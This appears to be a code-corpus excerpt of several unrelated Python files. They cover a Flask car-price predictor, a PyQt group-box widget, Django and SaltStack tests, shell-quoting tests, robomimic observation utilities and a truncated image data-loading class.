= request.form['Location'] if loc=='Bangalore': Bangalore=1 elif loc=='Chennai': Chennai=1 elif loc=='Pune': Pune=1 elif loc=='Mumbai': Mumbai=1 elif loc=='Coimbatore': Coimbatore=1 elif loc=='Hyderabad': Hyderabad=1 elif loc=='Jaipur': Jaipur=1 elif loc=='Kochi': Kochi=1 elif loc=='Kolkata': Kolkata=1 elif loc=='Delhi': Delhi=1 else: Ahmedabad=1 fuel = request.form['Fuel'] if fuel=='Diesel': Diesel=1 elif fuel=='Petrol': Petrol=1 elif fuel=='LPG': LPG=1 else: CNG=1 trans = request.form['Transmission'] if trans == 'Manual': Manual=1 Year = request.form['Year'] Kms = request.form['Kms'] Own = request.form['Owner'] Mileage = request.form['Mileage'] Engine = request.form['Engine'] Power = request.form['Power'] Seat = request.form['Seats'] #PREDICTION Price = regressor.predict([[ Year,Kms,Own,Mileage,Engine,Power,Seat,AUDI,BENTLEY,BMW,CHEVROLET,DATSUN,FIAT,FORCE,FORD,HONDA, HYUNDAI,ISUZU,JAGUAR,JEEP,LAMBORGHINI,LAND,MAHINDRA,MARUTI,MERCEDES,MINI,MITSUBISHI,NISSAN, PORSCHE,RENAULT,SKODA,TATA,TOYOTA,VOLKSWAGEN,VOLVO,Bangalore,Chennai,Coimbatore,Delhi,Hyderabad, Jaipur,Kochi,Kolkata,Mumbai,Pune,Diesel,LPG,Petrol,Manual ]]) output=round(Price[0],2) return render_template('car.html',prediction_text="Your car's price should be Rs. {} lakhs. This price may change depending on the condition of the car.".format(output)) return render_template("car.html") if __name__ == "__main__": app.run(debug=True)
nilq/baby-python
python
"""Qgroupbox module.""" # -*- coding: utf-8 -*- from PyQt6 import QtWidgets, QtCore # type: ignore[import] from pineboolib.core import decorators from pineboolib.core import settings from pineboolib import logging from . import qwidget from typing import Any logger = logging.get_logger(__name__) class QGroupBox(QtWidgets.QGroupBox, qwidget.QWidget): # type: ignore [misc] # noqa: F821 """QGroupBox class.""" # style_str: str # _line_width: int presset = QtCore.pyqtSignal(int) selectedId: int line_width: int = 1 def __init__(self, *args, **kwargs) -> None: """Inicialize.""" if len(args): name = None parent = None if isinstance(args[0], str): name = args[0] else: parent = args[0] if len(args) > 1: if isinstance(args[1], str): name = args[1] else: parent = args[1] if parent is not None: super().__init__(parent, **kwargs) else: super().__init__(**kwargs) if name is not None: self.setObjectName(name) else: super().__init__() if not settings.CONFIG.value("ebcomportamiento/spacerLegacy", False): self.setSizePolicy( QtWidgets.QSizePolicy.Policy.Expanding, QtWidgets.QSizePolicy.Policy.Preferred ) self.setContentsMargins(0, 2, 0, 2) def setLayout(self, layout: QtWidgets.QLayout) -> None: """Set layout to QGroupBox.""" # layout.setContentsMargins(0, 0, 0, 0) # layout.setSpacing(0) super().setLayout(layout) def setLineWidth(self, width: int) -> None: """Set line width.""" style_ = ( "QGroupBox#%s { border: %spx solid gray; margin-top: 20px; border-radius: 3px;}" % (self.objectName(), width) ) self.line_width = width self.setStyleSheet(style_) def setTitle(self, title: str) -> None: """Set title.""" if self.line_width == 0: title = "" if title == "": self.setLineWidth(0) super().setTitle(title) def get_enabled(self) -> bool: """Return if enabled.""" return self.isEnabled() def set_enabled(self, value: bool) -> None: """Set enabled.""" self.setDisabled(not value) @decorators.pyqt_slot(bool) def setShown(self, value: bool) -> None: """Set shown.""" self.setVisible(value) def __setattr__(self, name: str, value: Any) -> None: """Set an attribute especified by name.""" if name == "title": self.setTitle(str(value)) else: super().__setattr__(name, value) @decorators.not_implemented_warn def setFrameShadow(self, frame_shadow: None) -> None: """Set frame shadow.""" pass @decorators.not_implemented_warn def setFrameShape(self, frame_shape: None) -> None: """Set frame shape.""" pass @decorators.not_implemented_warn def newColumn(self) -> None: """Create a new column.""" pass enabled = property(get_enabled, set_enabled)
nilq/baby-python
python
from datetime import timedelta from django.test import TestCase from django.utils.timezone import now from core.models.route import Route from core.models.station import Station from core.models.tender import Tender from core.models.workshop import Workshop TEST_WORKSHOP = 'Bw Hagen' TEST_ROUTE = 'KBS 100 Hamburg - Rostock' TEST_DESCRIPTION = """Die Stadt Hamburg, die Nahverkehrsgesellschaft Schleswig-Holstein und das Verkehrsministerium Mecklenburg-Vorpommern schreiben aus.""" class TenderModelTest(TestCase): def setUp(self): Route.objects.create(name=TEST_ROUTE, type=Route.LOCAL) Station.objects.create(name='Hagen Hbf') Workshop.objects.create(name='Bw Hagen', station=Station.objects.get(name="Hagen Hbf")) @staticmethod def test_create_valid_min(): Tender.objects.create(route=Route.objects.get(name=TEST_ROUTE)) @staticmethod def test_create_valid_full(): Tender.objects.create(route=Route.objects.get(name=TEST_ROUTE), text=TEST_DESCRIPTION, start_date=now(), end_date=now() + timedelta(days=2 * 365)) @staticmethod def test_add_workshop(): tender = Tender.objects.create(route=Route.objects.get(name=TEST_ROUTE)) tender.workshops.add(Workshop.objects.get(name=TEST_WORKSHOP)) def test_to_string(self): tender = Tender.objects.create(route=Route.objects.get(name=TEST_ROUTE), text=TEST_DESCRIPTION, start_date=now(), end_date=now() + timedelta(days=2 * 365)) self.assertEquals(tender.__str__(), TEST_ROUTE)
nilq/baby-python
python
from io import StringIO from .. import * from bfg9000 import path from bfg9000 import safe_str from bfg9000.shell.syntax import * class my_safe_str(safe_str.safe_string): pass class TestWriteString(TestCase): def test_variable(self): out = Writer(StringIO()) out.write('foo', Syntax.variable) out.write('$bar', Syntax.variable) self.assertEqual(out.stream.getvalue(), 'foo$bar') def test_shell(self): out = Writer(StringIO()) out.write('foo', Syntax.shell) out.write('$bar', Syntax.shell) self.assertEqual(out.stream.getvalue(), "foo'$bar'") class TestWriteLiteral(TestCase): def test_variable(self): out = Writer(StringIO()) out.write(safe_str.literal('$foo'), Syntax.variable) self.assertEqual(out.stream.getvalue(), '$foo') def test_shell(self): out = Writer(StringIO()) out.write(safe_str.literal('$foo'), Syntax.shell) self.assertEqual(out.stream.getvalue(), '$foo') class TestWriteJbos(TestCase): def test_variable(self): out = Writer(StringIO()) s = safe_str.jbos('$foo', safe_str.literal('bar')) out.write(s, Syntax.variable) self.assertEqual(out.stream.getvalue(), '$foobar') def test_shell(self): out = Writer(StringIO()) s = safe_str.jbos('$foo', safe_str.literal('bar')) out.write(s, Syntax.shell) self.assertEqual(out.stream.getvalue(), "'$foo'bar") class TestWritePath(PathTestCase): def test_variable(self): out = Writer(StringIO()) out.write(self.Path('foo', path.InstallRoot.bindir), Syntax.variable) self.assertEqual(out.stream.getvalue(), self.ospath.join('${bindir}', 'foo')) def test_shell(self): out = Writer(StringIO()) out.write(self.Path('foo', path.InstallRoot.bindir), Syntax.shell) self.assertEqual(out.stream.getvalue(), "'" + self.ospath.join('${bindir}', 'foo') + "'") class TestWriteInvalid(TestCase): def test_invalid(self): out = Writer(StringIO()) with self.assertRaises(TypeError): out.write(my_safe_str(), Syntax.variable) class TestWriteEach(TestCase): def test_basic(self): out = Writer(StringIO()) out.write_each(['foo', 'bar'], Syntax.variable) self.assertEqual(out.stream.getvalue(), 'foo bar') def test_delims(self): out = Writer(StringIO()) out.write_each(['foo', 'bar'], Syntax.variable, ',', '[', ']') self.assertEqual(out.stream.getvalue(), '[foo,bar]') class TestVariable(TestCase): def test_equality(self): self.assertTrue(Variable('foo') == Variable('foo')) self.assertFalse(Variable('foo') != Variable('foo')) self.assertFalse(Variable('foo') == Variable('bar')) self.assertTrue(Variable('foo') != Variable('bar')) def test_concat_str(self): self.assertEqual(Variable('foo') + 'bar', safe_str.jbos( safe_str.literal('${foo}'), 'bar' )) self.assertEqual('foo' + Variable('bar'), safe_str.jbos( 'foo', safe_str.literal('${bar}') )) def test_concat_path(self): self.assertEqual(Variable('foo') + path.Path('bar'), safe_str.jbos( safe_str.literal('${foo}'), path.Path('bar') )) self.assertEqual(path.Path('foo') + Variable('bar'), safe_str.jbos( path.Path('foo'), safe_str.literal('${bar}') )) def test_concat_var(self): self.assertEqual(Variable('foo') + Variable('bar'), safe_str.jbos( safe_str.literal('${foo}'), safe_str.literal('${bar}') )) def test_hash(self): self.assertEqual(hash(Variable('foo')), hash(Variable('foo')))
nilq/baby-python
python
""" A collection of utilities for working with observation dictionaries and different kinds of modalities such as images. """ import numpy as np from copy import deepcopy from collections import OrderedDict import torch import torch.nn.functional as F import robomimic.utils.tensor_utils as TU # DO NOT MODIFY THIS! # This keeps track of observation types - and is populated on call to @initialize_obs_utils_with_obs_specs. # This will be a dictionary that maps observation type (e.g. low_dim, image) to a list of observation # modalities under that observation type. OBS_TYPE_TO_MODALITIES = None def initialize_obs_utils_with_obs_specs(obs_modality_specs): """ This function should be called before using any modality-specific functions in this file, in order to make sure that all utility functions are aware of the observation types (e.g. which ones are low-dimensional, and which ones are images). It constructs a dictionary that map observation type (e.g. low_dim, image) to a list of observation modalities under that type. Input should be a nested dictionary (or list of such dicts) with the following structure: obs_variant (str): obs_type (str): modalities (list) ... ... Example: { "obs": { "low_dim": ["robot0_eef_pos", "robot0_eef_quat"], "image": ["agentview_image", "robot0_eye_in_hand"], } "goal": { "low_dim": ["robot0_eef_pos"], "image": ["agentview_image"] } } In the example, raw observations consist of low-dim and image types, with the robot end effector pose under low-dim, and the agentview and wrist camera images under image, while goal observations also consist of low-dim and image types, with a subset of the raw observation modalities per type. Args: obs_modality_specs (dict or list): A nested dictionary (see docstring above for an example) or a list of nested dictionaries. Accepting a list as input makes it convenient for situations where multiple modules may each have their own modality spec. """ global OBS_TYPE_TO_MODALITIES # accept one or more spec dictionaries - if it's just one, account for this if isinstance(obs_modality_specs, dict): obs_modality_spec_list = [obs_modality_specs] else: obs_modality_spec_list = obs_modality_specs # iterates over observation specs obs_type_mapping = {} for obs_modality_spec in obs_modality_spec_list: # iterates over observation variants (e.g. observations, goals, subgoals) for obs_variant in obs_modality_spec: for obs_type in obs_modality_spec[obs_variant]: # add all modalities for each obs-type to the corresponding list in obs_type_mapping if obs_type not in obs_type_mapping: obs_type_mapping[obs_type] = [] obs_type_mapping[obs_type] += obs_modality_spec[obs_variant][obs_type] # remove duplicate entries and store in global mapping OBS_TYPE_TO_MODALITIES = { obs_type : list(set(obs_type_mapping[obs_type])) for obs_type in obs_type_mapping } print("\n============= Initialized Observation Utils with Obs Spec =============\n") for obs_type in OBS_TYPE_TO_MODALITIES: print("using obs type: {} with modalities: {}".format(obs_type, OBS_TYPE_TO_MODALITIES[obs_type])) def initialize_obs_utils_with_config(config): """ Utility function to parse config and call @initialize_obs_utils_with_obs_specs with the correct arguments. Args: config (BaseConfig instance): config object """ if config.algo_name == "hbc": obs_modality_specs = [ config.observation.planner.modalities, config.observation.actor.modalities, ] elif config.algo_name == "iris": obs_modality_specs = [ config.observation.value_planner.planner.modalities, config.observation.value_planner.value.modalities, config.observation.actor.modalities, ] else: obs_modality_specs = [config.observation.modalities] initialize_obs_utils_with_obs_specs(obs_modality_specs=obs_modality_specs) def key_is_obs_type(key, obs_type): """ Check if observation key corresponds to a type @obs_type. Args: key (str): modality name to check obs_type (str): observation type - usually one of "low_dim" or "image" """ assert OBS_TYPE_TO_MODALITIES is not None, "error: must call ObsUtils.initialize_obs_utils_with_obs_config first" return (key in OBS_TYPE_TO_MODALITIES[obs_type]) def key_is_image(key): """ Check if observation key corresponds to image observation. """ return key_is_obs_type(key, obs_type="image") def center_crop(im, t_h, t_w): """ Takes a center crop of an image. Args: im (np.array or torch.Tensor): image of shape (..., height, width, channel) t_h (int): height of crop t_w (int): width of crop Returns: im (np.array or torch.Tensor): center cropped image """ assert(im.shape[-3] >= t_h and im.shape[-2] >= t_w) assert(im.shape[-1] in [1, 3]) crop_h = int((im.shape[-3] - t_h) / 2) crop_w = int((im.shape[-2] - t_w) / 2) return im[..., crop_h:crop_h + t_h, crop_w:crop_w + t_w, :] def batch_image_hwc_to_chw(im): """ Channel swap for images - useful for preparing images for torch training. Args: im (np.array or torch.Tensor): image of shape (batch, height, width, channel) or (height, width, channel) Returns: im (np.array or torch.Tensor): image of shape (batch, channel, height, width) or (channel, height, width) """ start_dims = np.arange(len(im.shape) - 3).tolist() s = start_dims[-1] if len(start_dims) > 0 else -1 if isinstance(im, np.ndarray): return im.transpose(start_dims + [s + 3, s + 1, s + 2]) else: return im.permute(start_dims + [s + 3, s + 1, s + 2]) def batch_image_chw_to_hwc(im): """ Inverse of channel swap in @batch_image_hwc_to_chw. Args: im (np.array or torch.Tensor): image of shape (batch, channel, height, width) or (channel, height, width) Returns: im (np.array or torch.Tensor): image of shape (batch, height, width, channel) or (height, width, channel) """ start_dims = np.arange(len(im.shape) - 3).tolist() s = start_dims[-1] if len(start_dims) > 0 else -1 if isinstance(im, np.ndarray): return im.transpose(start_dims + [s + 2, s + 3, s + 1]) else: return im.permute(start_dims + [s + 2, s + 3, s + 1]) def process_obs(obs_dict): """ Process image observations in observation dictionary to prepare for network input. Args: obs_dict (dict): dictionary mappping observation modality to np.array or torch.Tensor. Leading batch dimensions are optional. Returns: new_dict (dict): dictionary where image modalities have been processsed by @process_image """ new_dict = { k : obs_dict[k] for k in obs_dict } # shallow copy for k in new_dict: if key_is_image(k): new_dict[k] = process_image(new_dict[k]) return new_dict def process_image(image): """ Given image fetched from dataset, process for network input. Converts array to float (from uint8), normalizes pixels to [0, 1], and channel swaps from (H, W, C) to (C, H, W). Args: image (np.array or torch.Tensor): image array Returns: processed_image (np.array or torch.Tensor): processed image """ assert image.shape[-1] == 3 # check for channel dimensions image = TU.to_float(image) image /= 255. image = batch_image_hwc_to_chw(image) return image def unprocess_obs(obs_dict): """ Prepare processed image observations for saving to dataset. Inverse of @process_obs. Args: obs_dict (dict): dictionary mappping observation modality to np.array or torch.Tensor. Leading batch dimensions are optional. Returns: new_dict (dict): dictionary where image modalities have been processsed by @unprocess_image """ new_dict = { k : obs_dict[k] for k in obs_dict } # shallow copy for k in new_dict: if key_is_image(k): new_dict[k] = unprocess_image(new_dict[k]) return new_dict def unprocess_image(image): """ Given image prepared for network input, prepare for saving to dataset. Inverse of @process_image. Args: image (np.array or torch.Tensor): image array Returns: unprocessed_image (np.array or torch.Tensor): image passed through inverse operation of @process_image """ assert image.shape[-3] == 3 # check for channel dimension image = batch_image_chw_to_hwc(image) image *= 255. image = TU.to_uint8(image) return image def process_image_shape(image_shape): """ Given image shape in dataset, infer the network input shape. This accounts for the channel swap to prepare images for torch training (see @process_image). Args: image_shape (tuple or list): tuple or list of size 3 or 4, corresponding to the image shape to process Returns: processed_image_shape (tuple): image shape that would result from the output of @process_image """ if len(image_shape) == 3: return image_shape[2], image_shape[0], image_shape[1] elif len(image_shape) == 4: return image_shape[0], image_shape[3], image_shape[1], image_shape[2] else: raise ValueError("cannot handle image shape {}".format(image_shape)) def normalize_obs(obs_dict, obs_normalization_stats): """ Normalize observations using the provided "mean" and "std" entries for each observation modality. The observation dictionary will be modified in-place. Args: obs_dict (dict): dictionary mappping observation modality to np.array or torch.Tensor. Leading batch dimensions are optional. obs_normalization_stats (dict): this should map observation modality keys to dicts with a "mean" and "std" of shape (1, ...) where ... is the default shape for the observation. Returns: obs_dict (dict): obs dict with normalized observation arrays """ # ensure we have statistics for each modality key in the observation assert set(obs_dict.keys()).issubset(obs_normalization_stats) for m in obs_dict: mean = obs_normalization_stats[m]["mean"] std = obs_normalization_stats[m]["std"] # check shape consistency shape_len_diff = len(mean.shape) - len(obs_dict[m].shape) assert shape_len_diff in [0, 1], "shape length mismatch in @normalize_obs" assert mean.shape[shape_len_diff:] == obs_dict[m].shape, "shape mismatch in @normalize obs" # handle case where obs dict is not batched by removing stats batch dimension if shape_len_diff == 1: mean = mean[0] std = std[0] obs_dict[m] = (obs_dict[m] - mean) / std return obs_dict def has_image(obs_keys): """ Returns True if image modalities are present in the list of modalities. Args: obs_key (list): list of modalities """ for k in obs_keys: if key_is_image(k): return True return False def repeat_and_stack_observation(obs_dict, n): """ Given an observation dictionary and a desired repeat value @n, this function will return a new observation dictionary where each modality is repeated @n times and the copies are stacked in the first dimension. For example, if a batch of 3 observations comes in, and n is 2, the output will look like [ob1; ob1; ob2; ob2; ob3; ob3] in each modality. Args: obs_dict (dict): dictionary mappping observation modality to np.array or torch.Tensor. Leading batch dimensions are optional. n (int): number to repeat by Returns: repeat_obs_dict (dict): repeated obs dict """ return TU.repeat_by_expand_at(obs_dict, repeats=n, dim=0) def crop_image_from_indices(images, crop_indices, crop_height, crop_width): """ Crops images at the locations specified by @crop_indices. Crops will be taken across all channels. Args: images (torch.Tensor): batch of images of shape [..., C, H, W] crop_indices (torch.Tensor): batch of indices of shape [..., N, 2] where N is the number of crops to take per image and each entry corresponds to the pixel height and width of where to take the crop. Note that the indices can also be of shape [..., 2] if only 1 crop should be taken per image. Leading dimensions must be consistent with @images argument. Each index specifies the top left of the crop. Values must be in range [0, H - CH - 1] x [0, W - CW - 1] where H and W are the height and width of @images and CH and CW are @crop_height and @crop_width. crop_height (int): height of crop to take crop_width (int): width of crop to take Returns: crops (torch.Tesnor): cropped images of shape [..., C, @crop_height, @crop_width] """ # make sure length of input shapes is consistent assert crop_indices.shape[-1] == 2 ndim_im_shape = len(images.shape) ndim_indices_shape = len(crop_indices.shape) assert (ndim_im_shape == ndim_indices_shape + 1) or (ndim_im_shape == ndim_indices_shape + 2) # maybe pad so that @crop_indices is shape [..., N, 2] is_padded = False if ndim_im_shape == ndim_indices_shape + 2: crop_indices = crop_indices.unsqueeze(-2) is_padded = True # make sure leading dimensions between images and indices are consistent assert images.shape[:-3] == crop_indices.shape[:-2] device = images.device image_c, image_h, image_w = images.shape[-3:] num_crops = crop_indices.shape[-2] # make sure @crop_indices are in valid range assert (crop_indices[..., 0] >= 0).all().item() assert (crop_indices[..., 0] < (image_h - crop_height)).all().item() assert (crop_indices[..., 1] >= 0).all().item() assert (crop_indices[..., 1] < (image_w - crop_width)).all().item() # convert each crop index (ch, cw) into a list of pixel indices that correspond to the entire window. # 2D index array with columns [0, 1, ..., CH - 1] and shape [CH, CW] crop_ind_grid_h = torch.arange(crop_height).to(device) crop_ind_grid_h = TU.unsqueeze_expand_at(crop_ind_grid_h, size=crop_width, dim=-1) # 2D index array with rows [0, 1, ..., CW - 1] and shape [CH, CW] crop_ind_grid_w = torch.arange(crop_width).to(device) crop_ind_grid_w = TU.unsqueeze_expand_at(crop_ind_grid_w, size=crop_height, dim=0) # combine into shape [CH, CW, 2] crop_in_grid = torch.cat((crop_ind_grid_h.unsqueeze(-1), crop_ind_grid_w.unsqueeze(-1)), dim=-1) # Add above grid with the offset index of each sampled crop to get 2d indices for each crop. # After broadcasting, this will be shape [..., N, CH, CW, 2] and each crop has a [CH, CW, 2] # shape array that tells us which pixels from the corresponding source image to grab. grid_reshape = [1] * len(crop_indices.shape[:-1]) + [crop_height, crop_width, 2] all_crop_inds = crop_indices.unsqueeze(-2).unsqueeze(-2) + crop_in_grid.reshape(grid_reshape) # For using @torch.gather, convert to flat indices from 2D indices, and also # repeat across the channel dimension. To get flat index of each pixel to grab for # each sampled crop, we just use the mapping: ind = h_ind * @image_w + w_ind all_crop_inds = all_crop_inds[..., 0] * image_w + all_crop_inds[..., 1] # shape [..., N, CH, CW] all_crop_inds = TU.unsqueeze_expand_at(all_crop_inds, size=image_c, dim=-3) # shape [..., N, C, CH, CW] all_crop_inds = TU.flatten(all_crop_inds, begin_axis=-2) # shape [..., N, C, CH * CW] # Repeat and flatten the source images -> [..., N, C, H * W] and then use gather to index with crop pixel inds images_to_crop = TU.unsqueeze_expand_at(images, size=num_crops, dim=-4) images_to_crop = TU.flatten(images_to_crop, begin_axis=-2) crops = torch.gather(images_to_crop, dim=-1, index=all_crop_inds) # [..., N, C, CH * CW] -> [..., N, C, CH, CW] reshape_axis = len(crops.shape) - 1 crops = TU.reshape_dimensions(crops, begin_axis=reshape_axis, end_axis=reshape_axis, target_dims=(crop_height, crop_width)) if is_padded: # undo padding -> [..., C, CH, CW] crops = crops.squeeze(-4) return crops def sample_random_image_crops(images, crop_height, crop_width, num_crops, pos_enc=False): """ For each image, randomly sample @num_crops crops of size (@crop_height, @crop_width), from @images. Args: images (torch.Tensor): batch of images of shape [..., C, H, W] crop_height (int): height of crop to take crop_width (int): width of crop to take num_crops (n): number of crops to sample pos_enc (bool): if True, also add 2 channels to the outputs that gives a spatial encoding of the original source pixel locations. This means that the output crops will contain information about where in the source image it was sampled from. Returns: crops (torch.Tensor): crops of shape (..., @num_crops, C, @crop_height, @crop_width) if @pos_enc is False, otherwise (..., @num_crops, C + 2, @crop_height, @crop_width) crop_inds (torch.Tensor): sampled crop indices of shape (..., N, 2) """ device = images.device # maybe add 2 channels of spatial encoding to the source image source_im = images if pos_enc: # spatial encoding [y, x] in [0, 1] h, w = source_im.shape[-2:] pos_y, pos_x = torch.meshgrid(torch.arange(h), torch.arange(w)) pos_y = pos_y.float().to(device) / float(h) pos_x = pos_x.float().to(device) / float(w) position_enc = torch.stack((pos_y, pos_x)) # shape [C, H, W] # unsqueeze and expand to match leading dimensions -> shape [..., C, H, W] leading_shape = source_im.shape[:-3] position_enc = position_enc[(None,) * len(leading_shape)] position_enc = position_enc.expand(*leading_shape, -1, -1, -1) # concat across channel dimension with input source_im = torch.cat((source_im, position_enc), dim=-3) # make sure sample boundaries ensure crops are fully within the images image_c, image_h, image_w = source_im.shape[-3:] max_sample_h = image_h - crop_height max_sample_w = image_w - crop_width # Sample crop locations for all tensor dimensions up to the last 3, which are [C, H, W]. # Each gets @num_crops samples - typically this will just be the batch dimension (B), so # we will sample [B, N] indices, but this supports having more than one leading dimension, # or possibly no leading dimension. # # Trick: sample in [0, 1) with rand, then re-scale to [0, M) and convert to long to get sampled ints crop_inds_h = (max_sample_h * torch.rand(*source_im.shape[:-3], num_crops).to(device)).long() crop_inds_w = (max_sample_w * torch.rand(*source_im.shape[:-3], num_crops).to(device)).long() crop_inds = torch.cat((crop_inds_h.unsqueeze(-1), crop_inds_w.unsqueeze(-1)), dim=-1) # shape [..., N, 2] crops = crop_image_from_indices( images=source_im, crop_indices=crop_inds, crop_height=crop_height, crop_width=crop_width, ) return crops, crop_inds
nilq/baby-python
python
# -*- coding: utf-8 -*- """ Tests for the salt-run command """ from __future__ import absolute_import, print_function, unicode_literals import logging import pytest from tests.support.case import ShellCase from tests.support.helpers import slowTest log = logging.getLogger(__name__) @pytest.mark.usefixtures("salt_sub_minion") class CacheTest(ShellCase): """ Test the cache runner. """ @slowTest def test_cache(self): """ Store, list, fetch, then flush data """ # Store the data ret = self.run_run_plus( "cache.store", bank="cachetest/runner", key="test_cache", data="The time has come the walrus said", ) # Make sure we can see the new key ret = self.run_run_plus("cache.list", bank="cachetest/runner") self.assertIn("test_cache", ret["return"]) # Make sure we can see the new data ret = self.run_run_plus( "cache.fetch", bank="cachetest/runner", key="test_cache" ) self.assertIn("The time has come the walrus said", ret["return"]) # Make sure we can delete the data ret = self.run_run_plus( "cache.flush", bank="cachetest/runner", key="test_cache" ) ret = self.run_run_plus("cache.list", bank="cachetest/runner") self.assertNotIn("test_cache", ret["return"]) @slowTest def test_cache_invalid(self): """ Store, list, fetch, then flush data """ # Store the data ret = self.run_run_plus("cache.store",) # Make sure we can see the new key expected = "Passed invalid arguments:" self.assertIn(expected, ret["return"]) @slowTest def test_grains(self): """ Test cache.grains """ # Store the data ret = self.run_run_plus("cache.grains", tgt="minion") self.assertIn("minion", ret["return"]) @slowTest def test_pillar(self): """ Test cache.pillar """ # Store the data ret = self.run_run_plus("cache.pillar", tgt="minion") assert "minion" in ret["return"] assert "sub_minion" not in ret["return"] @slowTest def test_pillar_no_tgt(self): """ Test cache.pillar when no tgt is supplied. This should return pillar data for all minions """ # Store the data ret = self.run_run_plus("cache.pillar",) assert all(x in ret["return"] for x in ["minion", "sub_minion"]) @slowTest def test_pillar_minion_noexist(self): """ Test cache.pillar when the target does not exist """ ret = self.run_run_plus("cache.pillar", tgt="doesnotexist") assert "minion" not in ret["return"] assert "sub_minion" not in ret["return"] @slowTest def test_pillar_minion_tgt_type_pillar(self): """ Test cache.pillar when the target exists and tgt_type is pillar """ ret = self.run_run_plus("cache.pillar", tgt="monty:python", tgt_type="pillar",) assert all(x in ret["return"] for x in ["minion", "sub_minion"]) @slowTest def test_mine(self): """ Test cache.mine """ # Store the data ret = self.run_run_plus("cache.mine", tgt="minion") self.assertIn("minion", ret["return"])
nilq/baby-python
python
from os import listdir, path import random import csv import re import natsort import numpy import theano from skimage.io import imread from block_designer import BlockDesigner from sampler import Sampler import pdb class ImageFlipOracle(object): """ *_flip methods should take an image_name """ def __init__(self, flip_mode): self.noise = 0 if re.search('\.csv', flip_mode): self.image_name_to_flip_coord = {} with open(flip_mode, 'rb') as csvfile: reader = csv.reader(csvfile) next(reader, None) for row in reader: image_name = row[0] flip_coords = [int(row[1]), int(row[2])] self.image_name_to_flip_coord[image_name] = flip_coords def get_flip_lambda(self, flip_mode, deterministic=False): if re.search('\.csv', flip_mode): if deterministic: return self.align_flip else: return self.noisy_align_flip else: return { "no_flip": self.no_flip, "rand_flip": self.rand_flip, "align_flip": self.align_flip, "noisy_align_flip": self.noisy_align_flip }[flip_mode] def no_flip(self, image_name): return numpy.zeros(2) def rand_flip(self, image_name): return numpy.array([int(round(random.random())), int(round(random.random()))]) def align_flip(self, image_name): return numpy.array(self.image_name_to_flip_coord[image_name]) def noisy_align_flip(self, image_name): """ :param noise: float (0,1) where 1 is fully noise and 0 is fully deterministic. If greater than 0, predetermined correct flips will be swapped with a random flip with Pr(noise) """ if random.random() < self.noise: return ((self.align_flip(image_name) + self.rand_flip(image_name)) % 2) else: return self.align_flip(image_name) def reset_noise(self, level): assert(level >= 0 and level <= 1) self.noise = level class CropOracle(object): def __init__(self, out_dim): self.out_dim = out_dim def bottom_right_crop(self, img): h,w,c = img.shape max_t = h - self.out_dim max_l = w - self.out_dim return(max_t,h, max_l,w) def center_crop(self, img): max_t,h, max_l,w = self.bottom_right_crop(img) center_t = max_t / 2 center_l = max_l / 2 return(center_t, center_t + self.out_dim, center_l, center_l + self.out_dim) def uniform_crop(self, img): max_t,h, max_l,w = self.bottom_right_crop(img) rand_t = random.randint(0, max_t) rand_l = random.randint(0, max_l) return(rand_t, rand_t + self.out_dim, rand_l, rand_l + self.out_dim) def get_crop_lambda(self, mode): return { "center_crop": self.center_crop, "uniform_crop": self.uniform_crop }[mode] class ColorCastOracle(object): def __init__(self, n_channels, color_cast_range): self.n_channels = n_channels self.color_cast_range = color_cast_range def no_cast(self): return numpy.zeros(self.n_channels) def baidu_cast(self): # http://arxiv.org/abs/1501.02876v3 s = self.color_cast_range / 3.0 # 99.73% of values within 3 std deviations casts = [] mask = [] while len(casts) < self.n_channels: casts.append(numpy.random.normal(scale=s)) mask.append(round(random.random())) return(numpy.array(casts, dtype=int) * numpy.array(mask, dtype=int)) def get_color_cast_lambda(self, mode): return { "no_cast": self.no_cast, "baidu_cast": self.baidu_cast }[mode] class DataStream(object): """ Provides an interface for easily filling and replacing GPU cache of images """ def __init__(self, train_image_dir="data/train/centered_crop/", train_labels_csv_path="data/train/trainLabels.csv", image_shape=(128, 128, 3), batch_size=128, cache_size_factor=8, center=0, normalize=0, amplify=1, train_flip='no_flip', shuffle=1, test_image_dir=None, random_seed=None, valid_dataset_size=4864, valid_flip='no_flip', test_flip='no_flip', sample_class=None, custom_distribution=None, train_color_cast='no_cast', valid_color_cast='no_cast', test_color_cast='no_cast', color_cast_range=20, pre_train_crop='center_crop', train_crop='uniform_crop', valid_test_crop='center_crop', image_extension='.png'): self.train_image_dir = train_image_dir self.test_image_dir = test_image_dir self.image_shape = image_shape self.batch_size = batch_size self.cache_size = (self.batch_size * cache_size_factor) # size in images self.center = center self.mean = None self.normalize = normalize self.std = None self.amplify = amplify self.train_set_flipper = ImageFlipOracle(train_flip) test_set_flipper = ImageFlipOracle(test_flip) self.train_flip_lambda = self.train_set_flipper.get_flip_lambda(train_flip) self.valid_flip_lambda = self.train_set_flipper.get_flip_lambda(valid_flip, deterministic=True) self.test_flip_lambda = test_set_flipper.get_flip_lambda(test_flip, deterministic=True) self.valid_dataset_size = valid_dataset_size self.random_seed = random_seed self.sample_class = sample_class self.custom_distribution = custom_distribution color_cast_oracle = ColorCastOracle(self.image_shape[-1], color_cast_range) self.train_color_cast_lambda = color_cast_oracle.get_color_cast_lambda(train_color_cast) self.valid_color_cast_lambda = color_cast_oracle.get_color_cast_lambda(valid_color_cast) self.test_color_cast_lambda = color_cast_oracle.get_color_cast_lambda(test_color_cast) crop_oracle = CropOracle(self.image_shape[0]) self.pre_train_crop_lambda = crop_oracle.get_crop_lambda(pre_train_crop) self.train_crop_lambda = crop_oracle.get_crop_lambda(train_crop) self.valid_test_crop_lambda = crop_oracle.get_crop_lambda(valid_test_crop) self.image_extension = image_extension bd = BlockDesigner(train_labels_csv_path, seed=self.random_seed) self.K = bd.K valid_examples = bd.break_off_block(self.valid_dataset_size) self.train_examples = bd.remainder() self.n_train_batches = int(bd.size() / self.batch_size) self.valid_dataset = self.setup_valid_dataset(valid_examples) self.train_dataset = None if shuffle else self.setup_train_dataset() self.test_dataset = self.setup_test_dataset() self.n_test_examples = len(self.test_dataset["X"]) if self.sample_class: self.n_train_batches = int(len(self.train_dataset["X"]) / self.batch_size) # override in case Sampler is used (TODO make this neater) self.train_dataset_size = self.n_train_batches * self.batch_size if self.center == 1 or self.normalize == 1: self.calc_mean_std_image() def valid_set(self): all_val_images = numpy.zeros(((len(self.valid_dataset["y"]),) + self.image_shape), dtype=theano.config.floatX) for i, image in enumerate(self.valid_dataset["X"]): all_val_images[i, ...] = self.feed_image(image, self.train_image_dir, self.valid_test_crop_lambda, self.valid_flip_lambda, self.valid_color_cast_lambda) # b01c, Theano: bc01 CudaConvnet: c01b return numpy.rollaxis(all_val_images, 3, 1), numpy.array(self.valid_dataset["y"], 